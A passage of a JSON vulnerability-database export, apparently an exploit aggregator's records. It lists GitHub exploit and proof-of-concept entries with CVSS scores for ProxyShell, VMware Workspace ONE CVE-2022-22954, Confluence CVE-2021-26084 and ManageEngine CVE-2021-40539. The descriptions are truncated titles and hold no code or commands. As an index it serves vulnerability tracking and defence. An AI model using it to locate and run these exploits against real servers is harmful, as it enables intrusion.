"3DF3AA17-94C8-5E17-BCB8-F806D1746CDF", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-03T01:31:20", "description": "# Proxyshell-Scanner\nnuclei scanner for Proxyshell RCE (CVE-2021...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-10T15:01:02", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34423"], "modified": "2022-03-02T12:56:33", "id": "B3DDE0DD-F0B0-542D-8154-F61DCD2E49D9", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-10-20T02:13:44", "description": "## CVE-2022-22954 PoC\nVMware Workspace ONE Access and Identity M...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-20T01:25:12", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Identity Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22954"], "modified": "2022-10-20T01:25:27", "id": "EBE5222D-43AE-509D-8C28-291E83DF86C5", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-03T20:42:29", "description": "## CVE-2022-22954 PoC\nVMware Workspace ONE Access and Identity M...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-03T09:17:12", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Identity Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22954"], "modified": "2023-03-13T03:53:28", "id": "F2545817-7A3F-52E7-ADC5-B775C0DB8082", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-03T20:03:44", "description": "## CVE-2022-22954 PoC\nVMware Workspace ONE Access and Identity M...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-20T08:08:09", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Identity Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22954"], "modified": "2023-12-01T21:48:12", "id": "6A61F003-DE4D-520E-AD93-A581E4E22941", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-23T04:27:16", "description": "# CVE-2021-26084\nAtlassian Confluence CVE-2021-26084 one-liner ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-07T01:15:16", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-02-22T21:21:20", "id": "A4DD8B03-CBED-5284-83EA-6C21FE0EA21C", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-03T16:05:32", "description": "# CVE-2021-26084-EXP\r\n\r\nThis code is an exploit for the CVE-2021...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-07-03T07:31:29", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2023-09-11T11:40:35", "id": "5DB14853-1EDB-5A80-BD98-BB388CC80401", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-03T20:59:18", "description": "# CVE-2022-22954-Testi\nCVE-2022-22954 A\u00e7\u0131\u011f\u0131 test etme\n\nVMware Wo...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-12T09:35:17", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Identity Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22954"], "modified": "2022-04-14T10:25:38", "id": "F12DF8D7-84BD-522E-A6CA-0413FBDFB48F", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-03T20:58:55", "description": "## VMware-CVE-2022-22954-POC\n\n**\u58f0\u660e:\u8be5POC\u4ec5\u4f9b\u4e8e\u5b66\u4e60\u4e13\u7528\uff0c\u7981\u6b62\u4e00\u5207\u8fdd\u6cd5\u64cd\u4f5c\uff0c\u5982\u679c\u8fdb\u884c\u6076\u610f\u7834\u574f...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-09T10:14:50", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Identity Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22954"], "modified": "2022-09-07T05:13:35", "id": "A8AC5191-F5B7-5FE5-8702-B85CC7107869", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-05-11T15:23:29", "description": "# CVE-2022-22954-VMware-RCE\nCVE-2022-22954-VMw...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-12T05:48:24", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Identity Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22954"], "modified": "2022-05-11T12:18:03", "id": "4F304699-25C8-5BC6-B6F0-717268F65A9D", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-09-27T23:28:21", "description": "## CVE-2022-22954 PoC\nVMware Workspace ONE Access and Identity M...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-01T18:33:45", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Identity Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22954"], "modified": "2022-09-27T23:19:15", "id": "F63EAD10-66BD-5AD4-BB46-77371E11031D", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-03T20:59:26", "description": "# VMware-CVE-2022-22954-Command-Injector\n\nProof of Concept for e...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-14T23:38:06", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Identity Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22954"], "modified": "2022-04-16T10:53:07", "id": "979EA51E-E85A-5272-9311-AE6B0A2F756D", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-03T20:58:32", "description": "![CVE-2022-22954](https://socialify.git.ci/bewhale/CVE-2022-2295...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-13T16:18:56", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Identity Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22954"], "modified": "2023-09-28T11:37:55", "id": "CE3963DC-4AF7-5738-83F3-067854F4CE3C", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-03T20:58:50", "description": "# CVE-2022-22954 PoC - VMware Workspace ONE Access Freemarker Se...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-12T21:15:27", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Identity Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22954"], "modified": "2023-07-06T12:17:05", "id": "B8601FE7-3E95-5AD7-8C4E-05FAB57FBB6D", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-03T20:45:49", "description": "# CVE-2022-22954\n\nThis package detects a subset of\n[CVE-2022-229...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-12T18:08:58", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Identity Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22954"], "modified": "2023-04-14T16:51:34", "id": "FB4E2E7D-EBA0-5AD8-A2C0-6EE27D053537", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-18T04:59:39", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-17T02:51:40", "type": "githubexploit", "title": "Exploit for Improper Authentication in Zohocorp Manageengine Adselfservice Plus", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539"], "modified": "2021-11-09T16:02:02", "id": "20869A6E-1505-5A22-A2AB-A712FA03D363", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-03T22:00:24", "description": "Exploitation code for CVE-2021-40539\n\n...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T14:49:27", "type": "githubexploit", "title": "Exploit for Use of Incorrectly-Resolved Name or Reference in Zohocorp Manageengine Adselfservice Plus", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539"], "modified": "2023-11-24T20:19:46", "id": "A32F9E91-783B-5C20-9630-6A4E3DDA9AFF", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-17T22:52:28", "description": "# CVE-2021-34473-scanner\nScanner for CVE-2021-34473, ProxyShell,...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-11T12:20:07", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34473"], "modified": "2021-12-22T09:48:36", "id": "F00E8BE4-12D2-5F5B-A9AA-D627780259FB", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-06-10T20:47:15", "description": "# CVE-2021-2608...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-01T12:36:52", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-03-04T03:09:22", "id": "00AD1BE3-F5D6-5689-83B0-51AD7D8AFE8D", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-10T20:52:47", "description": "# CVE-2021-26084\nConfluence OGNL injection\n\nCVE-2021-26084 is an...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-09T06:19:13", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-03-31T23:43:54", "id": "A9A21055-01FA-5B3E-84B3-E294A9641418", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-10T20:52:06", "description": "This is a quick and dirty poc, tuned for a specifc confluence in...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": 